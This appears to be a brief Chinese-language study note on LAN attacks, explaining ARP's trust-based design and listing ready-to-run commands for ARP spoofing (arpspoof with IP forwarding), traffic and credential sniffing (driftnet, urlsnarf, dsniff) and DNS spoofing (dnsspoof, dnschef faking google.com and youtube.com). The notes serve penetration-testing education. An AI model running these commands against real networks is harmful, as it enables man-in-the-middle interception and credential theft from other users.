二、三层地址
交换机与HUB
– HUB全端口转发
– 交换机根据学习地址转发
– 混杂模式抓包
ARP协议
– 免费ARP
– 基于广播学习
– 以太网头、ARP头
– 请求、响应相对独立
– 基于传闻的协议
手动修改数据包实现ARP欺骗
arpspoof
– echo 1 > /proc/sys/net/ipv4/ip_forward
– arpspoof -t 1.1.1.12 -r 1.1.1.1
网络嗅探
– driftnet -i eth0 -a -d tempdir -s
– dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts
– urlsnarf -i eth0 – webspy -i eth0 1.1.1.10
– dsniff -i eth0 -m
/usr/share/dsniff/dsniff.services
DNS欺骗代理
– dnschef —fakeip=1.1.1.10 — fakedomains=www.google.com,www.youtube.com —interface 1.1.1.2 -q
将被害者DNS指向伪造的DNS服务器
s
若有收获,就点个赞吧
0 人点赞
